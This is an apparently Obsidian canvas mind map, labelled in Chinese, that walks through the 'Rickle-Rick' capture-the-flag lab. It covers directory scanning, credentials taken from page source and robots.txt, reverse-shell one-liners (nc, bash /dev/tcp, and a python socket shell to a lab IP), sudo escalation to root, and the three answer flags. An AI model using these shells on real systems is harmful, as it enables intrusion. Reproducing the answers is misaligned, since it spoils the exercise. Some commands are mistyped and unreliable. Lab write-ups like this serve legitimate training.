{
	"nodes":[
		{"id":"0a6980ec3bf45cc0","type":"group","x":-1167,"y":587,"width":1487,"height":105,"color":"4","label":"答案："},
		{"id":"6e91f0dec824ed72","type":"group","x":-632,"y":-12,"width":392,"height":353,"color":"4","label":"shell反弹成功"},
		{"id":"658bff7bb03b8c58","type":"group","x":-1147,"y":156,"width":387,"height":164,"color":"4","label":"提权成功"},
		{"id":"31c86e6808127146","type":"text","text":"目录爆破：gobuster","x":-632,"y":-307,"width":392,"height":68},
		{"id":"d29e200b524f99fa","type":"text","text":"`sudo bash -p` or `sudo bash` ","x":-1147,"y":176,"width":387,"height":50},
		{"id":"eaca132ec028478d","type":"text","text":"`sudo -l ` 发现用户sudo权限 \n`(ALL) NOPASSWD: ALL`","x":-1147,"y":-18,"width":387,"height":89},
		{"id":"42103df8f2565eeb","type":"text","text":"`whoami`  : root","x":-1147,"y":250,"width":387,"height":50},
		{"id":"f65782cd84a03270","type":"text","text":"Rickle-Rick","x":-1144,"y":-418,"width":384,"height":68},
		{"id":"c12079a8960b8e7d","type":"text","text":"访问web :http://10.10.204.241","x":-632,"y":-418,"width":392,"height":68},
		{"id":"4672b4b780cbbbf1","type":"text","text":"`cat  /home/rick/'second ingredients'`","x":-632,"y":448,"width":432,"height":50},
		{"id":"ca8dcd73bd1d2255","type":"text","text":"第二种成分:  **1 jerry tear**","x":-632,"y":607,"width":432,"height":65,"color":"4"},
		{"id":"42781fcd98eb15d4","type":"text","text":"\nnc lvvp 443 -e /bin/bash","x":-632,"y":-167,"width":392,"height":50,"color":"1"},
		{"id":"3de6d7b4368f1d45","type":"text","text":"第三种成分：`fleeb juice`","x":-1147,"y":607,"width":387,"height":65,"color":"4"},
		{"id":"9e0c05bb46ac11d1","type":"text","text":"`ls /root`\n`cat /root/3rd.txt`","x":-1147,"y":404,"width":387,"height":85},
		{"id":"1bec35f2fbe51303","type":"text","text":"web源码发现bash64 注释，解码发现内容是输入错误告警，无用。\n`echo 'string' | bash64 -d |bash64 -d`","x":-1150,"y":-209,"width":390,"height":110,"color":"2"},
		{"id":"e18b684ecfe74dfc","type":"text","text":"bash -C 'bash -i >& /dev/tcp/**Local-IP**/443 0>&1 '","x":-632,"y":8,"width":392,"height":50},
		{"id":"5b02fac95b3e962c","type":"text","text":"`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.106.222\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);`","x":-632,"y":89,"width":392,"height":232},
		{"id":"fc3d3f3f7a8d4064","type":"text","text":"第一种成分：**mr. meeseek hair**","x":-60,"y":607,"width":360,"height":65,"color":"4"},
		{"id":"6c37fed0bf634fac","type":"text","text":"login.php : 登录界面","x":-60,"y":-93,"width":360,"height":44,"color":"4"},
		{"id":"23b98c354de0c8e9","type":"text","text":"portal.php：可执行系统命令","x":-60,"y":12,"width":360,"height":44},
		{"id":"2e960ea0693a912e","type":"text","text":"**Sup3rS3cretPickl3Ingred.txt**","x":-60,"y":201,"width":360,"height":68},
		{"id":"b4d0c32fbb625e62","type":"text","text":"源码：Username：**R1ckRul3s**","x":-60,"y":-418,"width":360,"height":68,"color":"4"},
		{"id":"f863d38cef0428b0","type":"text","text":"robots.txt: password\n**Wubbalubbadubdub**","x":-60,"y":-307,"width":360,"height":68,"color":"4"}
	],
	"edges":[
		{"id":"88a097f40e7d2992","fromNode":"f65782cd84a03270","fromSide":"right","toNode":"c12079a8960b8e7d","toSide":"left"},
		{"id":"09d4b6c29eb8c6e5","fromNode":"c12079a8960b8e7d","fromSide":"right","toNode":"b4d0c32fbb625e62","toSide":"left","color":"4"},
		{"id":"168e3b5e52abf530","fromNode":"f65782cd84a03270","fromSide":"right","toNode":"31c86e6808127146","toSide":"left"},
		{"id":"a4860510d01645da","fromNode":"31c86e6808127146","fromSide":"right","toNode":"f863d38cef0428b0","toSide":"left","color":"4"},
		{"id":"aaf31c50653ce733","fromNode":"31c86e6808127146","fromSide":"right","toNode":"6c37fed0bf634fac","toSide":"left"},
		{"id":"020cdca49348151c","fromNode":"31c86e6808127146","fromSide":"right","toNode":"23b98c354de0c8e9","toSide":"left"},
		{"id":"c3911b4a890b7892","fromNode":"23b98c354de0c8e9","fromSide":"bottom","toNode":"2e960ea0693a912e","toSide":"top","color":"4","label":"ls"},
		{"id":"205f661d30e932ce","fromNode":"2e960ea0693a912e","fromSide":"bottom","toNode":"fc3d3f3f7a8d4064","toSide":"top","color":"4"},
		{"id":"9bc66af2803c8ef3","fromNode":"23b98c354de0c8e9","fromSide":"left","toNode":"42781fcd98eb15d4","toSide":"right","color":"1","label":"反弹失败"},
		{"id":"fa213224b661bbdf","fromNode":"23b98c354de0c8e9","fromSide":"left","toNode":"6e91f0dec824ed72","toSide":"right","color":"4"},
		{"id":"9a268ea80e145a0f","fromNode":"6e91f0dec824ed72","fromSide":"left","toNode":"eaca132ec028478d","toSide":"right","color":"4"},
		{"id":"293b1594cd71fe09","fromNode":"6e91f0dec824ed72","fromSide":"bottom","toNode":"4672b4b780cbbbf1","toSide":"top","color":"4"},
		{"id":"f7fd5639a3f50f13","fromNode":"4672b4b780cbbbf1","fromSide":"bottom","toNode":"ca8dcd73bd1d2255","toSide":"top","color":"4"},
		{"id":"5e83f9d6f6b9e81a","fromNode":"42781fcd98eb15d4","fromSide":"left","toNode":"1bec35f2fbe51303","toSide":"right","color":"2"},
		{"id":"a56f940398e52867","fromNode":"eaca132ec028478d","fromSide":"bottom","toNode":"658bff7bb03b8c58","toSide":"top","color":"4"},
		{"id":"564f18713f4d48b3","fromNode":"658bff7bb03b8c58","fromSide":"bottom","toNode":"9e0c05bb46ac11d1","toSide":"top","color":"4"},
		{"id":"7506424dbd7c9a0f","fromNode":"9e0c05bb46ac11d1","fromSide":"bottom","toNode":"3de6d7b4368f1d45","toSide":"top","color":"4"},
		{"id":"3e9dfb556f5863be","fromNode":"b4d0c32fbb625e62","fromSide":"right","toNode":"6c37fed0bf634fac","toSide":"right"},
		{"id":"6703454af247c1a7","fromNode":"f863d38cef0428b0","fromSide":"right","toNode":"6c37fed0bf634fac","toSide":"right"},
		{"id":"4b7182cab121c7df","fromNode":"6c37fed0bf634fac","fromSide":"bottom","toNode":"23b98c354de0c8e9","toSide":"top","color":"4"}
	]
}